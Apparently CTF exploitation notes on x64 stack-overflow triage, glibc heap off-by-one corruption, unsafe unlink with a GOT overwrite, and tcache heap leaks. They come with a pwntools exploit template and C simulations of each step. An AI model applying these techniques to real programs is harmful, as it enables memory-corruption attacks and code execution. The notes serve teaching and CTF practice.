Causing SIGSEGV on x64: usually happens when the program copies a long input into a stack buffer, which overflows over the saved $rbp and into the saved return address. When the function returns, `ret` pops 0x4141414141414141 ('AAAAAAAA') as the new $rip and the program crashes. x64 caveat: 0x4141414141414141 is not a canonical address (bits 48-63 must all equal bit 47), so the CPU faults on the `ret` instruction itself; in gdb $rip still points at the `ret` and the 'AAAAAAAA' is found at $rsp, not in $rip. Only a canonical but unmapped value (e.g. 0x41414141) shows up in $rip as the faulting address.
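Added example (not code from the original notes): the two things worth checking when that crash happens, as C helpers. `is_canonical` tells you whether the `ret` itself faulted or the jump landed, and the Metasploit-style cyclic pattern turns the qword found at $rsp (or in $rip) into the offset of the saved return address. It assumes the usual 48-bit x64 virtual address space; the pattern format and the 20280-byte period are the standard ones.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example, not code from the original notes: triage helpers for an
 * x64 stack-smash crash.  Assumes the usual 48-bit virtual address space
 * (four-level paging), which is what makes 0x4141414141414141 non-canonical. */

/* A 64-bit address is canonical iff bits 63..48 replicate bit 47. */
int is_canonical(uint64_t addr)
{
    uint64_t top = addr >> 47;          /* bits 63..47 as a 17-bit value */
    return top == 0 || top == 0x1ffff;  /* all zero (user) or all one (kernel) */
}

/* 1: the `ret` itself faults (#GP, reported as SIGSEGV), rip still points at
 *    the ret and the overwritten value sits at [rsp];
 * 0: rip == value and the fault is on fetching code from the target. */
int faults_on_ret(uint64_t value)
{
    return !is_canonical(value);
}

/* Metasploit-style cyclic pattern "Aa0Aa1Aa2..." (period 20280 bytes): any
 * 8-byte window is unique, so the qword read from [rsp] or rip gives the
 * offset of the saved return address from the start of the input. */
size_t pattern_create(char *out, size_t n)
{
    size_t pos = 0;
    for (int u = 'A'; u <= 'Z' && pos < n; u++)
        for (int l = 'a'; l <= 'z' && pos < n; l++)
            for (int d = '0'; d <= '9' && pos < n; d++) {
                char trip[3] = { (char)u, (char)l, (char)d };
                for (int k = 0; k < 3 && pos < n; k++)
                    out[pos++] = trip[k];
            }
    return pos;
}

/* Offset at which the little-endian qword `value` occurs in the first `n`
 * bytes of the pattern, or -1 if it is not there (then the crash value was
 * not our input, e.g. a stale pointer). */
long pattern_offset(uint64_t value, size_t n)
{
    static char pat[20280];
    if (n > sizeof pat) n = sizeof pat;
    pattern_create(pat, n);
    char needle[8];
    memcpy(needle, &value, 8);          /* register value -> memory byte order */
    for (size_t i = 0; i + 8 <= n; i++)
        if (memcmp(pat + i, needle, 8) == 0)
            return (long)i;
    return -1;
}

/* The qword that would land in the saved return address when it sits `off`
 * bytes into the input (round-trip helper for the self-check). */
uint64_t qword_at(size_t off)
{
    static char pat[20280];
    uint64_t v = 0;
    if (off + 8 > sizeof pat) return 0;
    pattern_create(pat, off + 8);
    memcpy(&v, pat + off, 8);
    return v;
}

int main(void)
{
    uint64_t crash = 0x4141414141414141ULL;
    printf("0x%016llx canonical=%d faults_on_ret=%d\n",
           (unsigned long long)crash, is_canonical(crash), faults_on_ret(crash));
    printf("qword at offset 40 found at %ld\n", pattern_offset(qword_at(40), 200));
    return 0;
}
```

Usage: send `pattern_create(buf, 200)` as the input, read the 8 bytes at `$rsp` at the `ret` (or `$rip` when the value was canonical), and `pattern_offset` gives the distance to the saved return address; pwntools' `cyclic`/`cyclic_find` do the same with a de Bruijn sequence.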
Heap crashes involve: 1. Off-by-one variant, which SOMETIMES (also depending on the libc version) overwrites the 'size' field of the next chunk on the heap, as shown in the devel0pment.de blog. The chunk header of the next chunk sits directly after the previous chunk's user data, so the one extra byte (typically a NUL terminator) lands on the lowest byte of that size field, shrinking the size and clearing PREV_INUSE. Whether that is exploitable depends on glibc: since the check added to unlink in 2.26 and to free()'s backward-consolidation path in 2.29, chunksize(p) must equal the prev_size stored in the following chunk, so the attacker also has to write a consistent prev_size, otherwise free() aborts with "corrupted size vs. prev_size" instead of merging into the fake chunk.
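Added example (not code from the original notes or the devel0pment.de post): two glibc-style chunks laid out by hand in a byte array, so the off-by-one on the next chunk's size field and the glibc 2.29+ size-vs-prev_size check can be run without the real allocator. The chunk sizes (0x110), the payload shape (fake chunk header, padding, prev_size 0x100) and the `edit_chunk_a` bug are all constructed for the demo; the field layout and flag names follow glibc's `malloc_chunk`.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Added example, not code from the original notes or the devel0pment.de post:
 * two glibc-style chunks built by hand in a byte array, so the off-by-one on
 * the next chunk's size field is reproducible without the real allocator.
 * Field layout and flag names follow glibc's malloc_chunk; the 0x110 chunk
 * sizes and the contents are constructed for the demo (x64, little-endian). */

#define PREV_INUSE 1ULL
#define SIZE_BITS  7ULL
#define CHUNK_A    0x000    /* attacker-editable chunk, size 0x110 */
#define CHUNK_B    0x110    /* victim chunk directly after it */
#define USER_LEN   0x108    /* malloc(0x108) -> 0x110 chunk; user data reaches B's prev_size */

struct heap_sim { uint8_t mem[0x300]; };

static uint64_t get64(const struct heap_sim *h, size_t off) { uint64_t v; memcpy(&v, h->mem + off, 8); return v; }
static void     put64(struct heap_sim *h, size_t off, uint64_t v) { memcpy(h->mem + off, &v, 8); }

uint64_t chunk_size(const struct heap_sim *h, size_t c) { return get64(h, c + 8) & ~SIZE_BITS; }
int      prev_inuse(const struct heap_sim *h, size_t c) { return (int)(get64(h, c + 8) & PREV_INUSE); }
uint64_t prev_size (const struct heap_sim *h, size_t c) { return get64(h, c); }

void heap_sim_init(struct heap_sim *h)
{
    memset(h->mem, 0, sizeof h->mem);
    put64(h, CHUNK_A + 8, 0x110 | PREV_INUSE);   /* A: size 0x110, chunk before it in use */
    put64(h, CHUNK_B + 8, 0x110 | PREV_INUSE);   /* B: size 0x110, A in use -> 0x111 */
}

/* The bug: copy len bytes into A's user data and NUL-terminate.  With
 * len == USER_LEN the terminator lands at A+0x10+0x108 == B+8, the lowest
 * byte of B's size field: 0x111 becomes 0x100 (smaller, PREV_INUSE clear). */
void edit_chunk_a(struct heap_sim *h, const uint8_t *data, size_t len)
{
    if (len > USER_LEN) len = USER_LEN;
    memcpy(h->mem + CHUNK_A + 0x10, data, len);
    h->mem[CHUNK_A + 0x10 + len] = 0;            /* off-by-one write */
}

/* Where free(c) would merge backwards.  Returns the target chunk offset;
 * -2 if PREV_INUSE is set (no backward merge); -3 if prev_size points
 * outside the simulated heap (real free() would read wild memory); -1 if
 * the glibc >= 2.29 "corrupted size vs. prev_size while consolidating"
 * check rejects it (glibc_check != 0 turns that check on). */
long consolidate_target(const struct heap_sim *h, size_t c, int glibc_check)
{
    if (prev_inuse(h, c)) return -2;
    uint64_t ps = prev_size(h, c);
    if (ps > c) return -3;
    size_t target = c - (size_t)ps;
    if (glibc_check && chunk_size(h, target) != ps) return -1;
    return (long)target;
}

/* Same shape as the template on this page: fake chunk header at A's user
 * pointer, 'F' padding, and prev_size 0x100 for B in the last qword. */
void build_payload(uint8_t out[USER_LEN], uint64_t fake_size)
{
    uint64_t zero = 0, ps = 0x100;
    memset(out, 'F', USER_LEN);
    memcpy(out + 0x00, &zero, 8);
    memcpy(out + 0x08, &fake_size, 8);
    memcpy(out + 0x100, &ps, 8);
}

/* B's raw size field after a plain 0x108-byte 'A' fill (the naive overflow). */
uint64_t size_after_plain_overflow(void)
{
    struct heap_sim h; uint8_t buf[USER_LEN];
    heap_sim_init(&h);
    memset(buf, 'A', sizeof buf);
    edit_chunk_a(&h, buf, sizeof buf);
    return get64(&h, CHUNK_B + 8);
}

/* Backward-merge lookup after the naive overflow: prev_size is 'AAAAAAAA'. */
long merge_target_after_plain_overflow(int glibc_check)
{
    struct heap_sim h; uint8_t buf[USER_LEN];
    heap_sim_init(&h);
    memset(buf, 'A', sizeof buf);
    edit_chunk_a(&h, buf, sizeof buf);
    return consolidate_target(&h, CHUNK_B, glibc_check);
}

/* Backward-merge lookup after the crafted payload with the given fake size. */
long merge_target_after_payload(uint64_t fake_size, int glibc_check)
{
    struct heap_sim h; uint8_t buf[USER_LEN];
    heap_sim_init(&h);
    build_payload(buf, fake_size);
    edit_chunk_a(&h, buf, sizeof buf);
    return consolidate_target(&h, CHUNK_B, glibc_check);
}

int main(void)
{
    printf("B size after 'A'*0x108: 0x%llx\n", (unsigned long long)size_after_plain_overflow());
    printf("fake 0x101: target %ld (new glibc)\n", merge_target_after_payload(0x101, 1));
    printf("fake 0x121: target %ld (new glibc), %ld (old glibc)\n",
           merge_target_after_payload(0x121, 1), merge_target_after_payload(0x121, 0));
    return 0;
}
```

The fake size 0x101 passes the check because chunksize(fake) = 0x100 equals the prev_size written for B, which is exactly why the template below uses `p64(0x101)` together with `p64(0x100)`; with a mismatching fake size only pre-2.29 glibc still merges.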
Solution template for CTF heap exploits: after leaking a libc address it is possible to ROP (or overwrite a GOT entry or hook) to get a shell. In some CTFs the goal is only to redirect $rip into a function that reads the flag, not a syscall or system('/bin/sh').
from pwn import *

# Challenge-specific wrappers (create/edit/delete/show/alloc/free), the process
# handle p, elf = ELF('./chall') and the pointer array at 0x6020D8 (slot 3 of the
# program's chunk table) all come from the target binary.

# leak libc via unsafe unlink
for i in range(5):
    create(0x108, b'A' * 0x108)
# fake chunk at chunk 3's user pointer; fd/bk are chosen so that fd->bk and
# bk->fd both read *0x6020D8, which holds that very pointer (unlink check passes)
fake = b''
fake += p64(0) + p64(0x101)
fake += p64(0x6020D8 - 0x18) + p64(0x6020D8 - 0x10)
# pad up to chunk 4's header: prev_size = 0x100 (matches the fake size), then
# the two low bytes of chunk 4's size become 0x0110, clearing PREV_INUSE
edit(3, fake + b'F' * 0xE0 + p64(0x100) + p64(0x110)[:2])
delete(4)                          # backward consolidation unlinks the fake chunk: *0x6020D8 = 0x6020D8 - 0x18 (slot 0)
edit(3, p64(elf.got['strlen']))    # chunk 3 now points into the table: slot 0 -> strlen@got
edit(0, p64(elf.sym['puts']))      # strlen@got = puts
edit(3, p64(elf.got['setvbuf']))   # slot 0 -> setvbuf@got
edit(0, b'\n')                     # the program's strlen() call on the buffer is now puts(setvbuf@got): libc leak
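Added example (not code from the original notes): the unlink step that the fake chunk above relies on, reproduced in-process with glibc's `unlink` logic (the pre-2.32 fd/bk form, which is what the template targets). A global `slots[]` table stands in for the program's pointer array at 0x6020D8 (slot 3) and a buffer stands in for chunk 3's user data; both are constructed for the demo, and the offsets assume 64-bit pointers.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Added example, not code from the original notes: the unlink that the
 * fake-chunk template relies on, run in-process against glibc's own
 * fd->bk / bk->fd check.  slots[] stands in for the program's pointer table
 * (slot 3 plays the role of 0x6020D8), chunk3_data for chunk 3's user data.
 * Offsets assume 64-bit pointers. */

#define OFF_FD 0x10
#define OFF_BK 0x18

/* every qword access goes through memcpy so the pointer table and the chunk
 * buffer can be treated as raw memory without aliasing trouble */
static uintptr_t ld(uintptr_t a) { uintptr_t v; memcpy(&v, (void *)a, sizeof v); return v; }
static void      st(uintptr_t a, uintptr_t v) { memcpy((void *)a, &v, sizeof v); }

uintptr_t slots[4];                  /* program's chunk pointer table */
static uint8_t chunk3_data[0x100];   /* user data of chunk 3, holds the fake chunk */

/* glibc unlink (malloc.c, pre-2.32): 0 on success, -1 when the
 * "corrupted double-linked list" check fires. */
int glibc_unlink(uintptr_t p)
{
    uintptr_t fd = ld(p + OFF_FD), bk = ld(p + OFF_BK);
    if (ld(fd + OFF_BK) != p || ld(bk + OFF_FD) != p)
        return -1;
    st(fd + OFF_BK, bk);             /* FD->bk = BK */
    st(bk + OFF_FD, fd);             /* BK->fd = FD  (this write wins: *slot = slot - 0x18) */
    return 0;
}

/* Fake chunk exactly as in the template: fd = slot - 0x18, bk = slot - 0x10,
 * so fd->bk and bk->fd both dereference the slot, which holds the fake
 * chunk's own address (the program stored it there on allocation). */
void build_fake_chunk(uintptr_t slot_addr, uintptr_t fd_delta, uintptr_t bk_delta)
{
    uintptr_t fake = (uintptr_t)chunk3_data;
    memset(chunk3_data, 0, sizeof chunk3_data);
    st(fake + 0, 0);
    st(fake + 8, 0x101);
    st(fake + OFF_FD, slot_addr - fd_delta);
    st(fake + OFF_BK, slot_addr - bk_delta);
    st(slot_addr, fake);
}

/* fake chunk -> unlink (what delete(4) triggers) -> "edit(3, target)" writes
 * through the corrupted slot.  Returns the value slot 0 ends up holding. */
uintptr_t unsafe_unlink_demo(uintptr_t target)
{
    memset(slots, 0, sizeof slots);
    uintptr_t slot3 = (uintptr_t)&slots[3];
    build_fake_chunk(slot3, 0x18, 0x10);
    if (glibc_unlink(ld(slot3)) != 0) return 0;
    /* slots[3] == slot3 - 0x18 == &slots[0]: editing chunk 3 now edits the table */
    st(ld(slot3), target);
    return slots[0];
}

/* Same setup with fd off by one qword: fd->bk no longer reads the slot. */
int unlink_rejects_bad_fake(void)
{
    memset(slots, 0, sizeof slots);
    uintptr_t slot3 = (uintptr_t)&slots[3];
    build_fake_chunk(slot3, 0x20, 0x10);
    return glibc_unlink(ld(slot3));
}

int main(void)
{
    uintptr_t got = unsafe_unlink_demo(0xdeadbeef);
    printf("slot 0 = 0x%lx, slot 3 -> %s\n", (unsigned long)got,
           slots[3] == (uintptr_t)&slots[0] ? "&slots[0]" : "elsewhere");
    printf("bad fake chunk: unlink returns %d\n", unlink_rejects_bad_fake());
    return 0;
}
```

After the unlink, slot 3 points 0x18 bytes below itself, i.e. at slot 0, so every later `edit(3, ...)` is a write into the pointer table and every `edit(0, ...)` a write to whatever address was planted there; that is the arbitrary-write primitive the GOT overwrite in the template uses.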
# heap leak (tcache): free three chunks of one size, take one back, and its
# first qword still holds the tcache 'next' pointer to another freed chunk
for i in range(3):
    alloc(0x30, b'A' * 0x20)
for i in range(3):
    free(i)
alloc(0, b'a')     # size arg as in the original template; the chunk must come back from the same tcache bin.
                   # the single byte only clobbers the low byte of the pointer
show(0)
leak = p.recvline()[:-1]
heap = u64(leak.ljust(8, b'\x00'))
# on glibc >= 2.32 the pointer is safe-linked: demangle with (addr_of_field >> 12) ^ heap
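Added example (not code from the original notes): the tcache leak from the template above, run against the real allocator in-process. It assumes glibc 2.26 or newer (tcache present); on glibc 2.32 and later the stored `next` pointer is safe-linked, and the demangling used here is glibc's `PROTECT_PTR` formula. On other allocators (musl, for example) freed chunks are laid out differently and the demo reports failure instead of a leak.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Added example, not code from the original notes: the tcache leak from the
 * template, against the real allocator.  Assumes glibc 2.26+ (tcache); on
 * 2.32+ the next pointer is safe-linked and is demangled below.  Other
 * allocators lay freed chunks out differently and the demo returns 0. */

/* glibc 2.32+ PROTECT_PTR: next is stored as (address of the next field >> 12) ^ next */
uintptr_t safe_link_reveal(uintptr_t field_addr, uintptr_t stored)
{
    return (field_addr >> 12) ^ stored;
}

/* Bit 0: malloc after three frees returns the last freed chunk (tcache is LIFO).
 * Bit 1: its first qword (raw, or demangled on 2.32+) is the previously freed
 *        chunk, i.e. a heap address is what show() prints.
 * Bit 2: after the template's one-byte write ('a') the upper 7 bytes still
 *        leak; only the low byte has to be reconstructed. */
int tcache_leak_demo(void)
{
    void *c[3];
    for (int i = 0; i < 3; i++) {            /* alloc(0x30, 'A' * 0x20) x3 */
        c[i] = malloc(0x30);
        memset(c[i], 'A', 0x20);
    }
    for (int i = 0; i < 3; i++)              /* free(0..2): all go to the 0x40 tcache bin */
        free(c[i]);

    void *back = malloc(0x30);               /* same size, so it comes from that bin */
    int result = (back == c[2]);

    uintptr_t stored;
    memcpy(&stored, back, sizeof stored);    /* show(0) before anything is written */
    uintptr_t expect = (uintptr_t)c[1];
    int raw = (stored == expect);
    int linked = (safe_link_reveal((uintptr_t)back, stored) == expect);
    if (raw || linked) result |= 2;

    ((unsigned char *)back)[0] = 'a';        /* alloc(.., 'a'): only the low byte is clobbered */
    memcpy(&stored, back, sizeof stored);
    uintptr_t rec = raw ? stored : safe_link_reveal((uintptr_t)back, stored);
    if ((rec & ~(uintptr_t)0xff) == (expect & ~(uintptr_t)0xff)) result |= 4;

    free(back);
    return result;
}

int main(void)
{
    int r = tcache_leak_demo();
    printf("LIFO=%d leak=%d leak_after_1byte_write=%d\n", r & 1, (r >> 1) & 1, (r >> 2) & 1);
    return 0;
}
```

When `raw` is false but `linked` is true the target runs glibc 2.32+, and the template's `heap = u64(...)` value has to be XORed with `(address_of_the_chunk >> 12)`; the chunk address is unknown at that point, but its top bits agree with the leak, so the usual trick is to demangle with the leaked value's own upper bits.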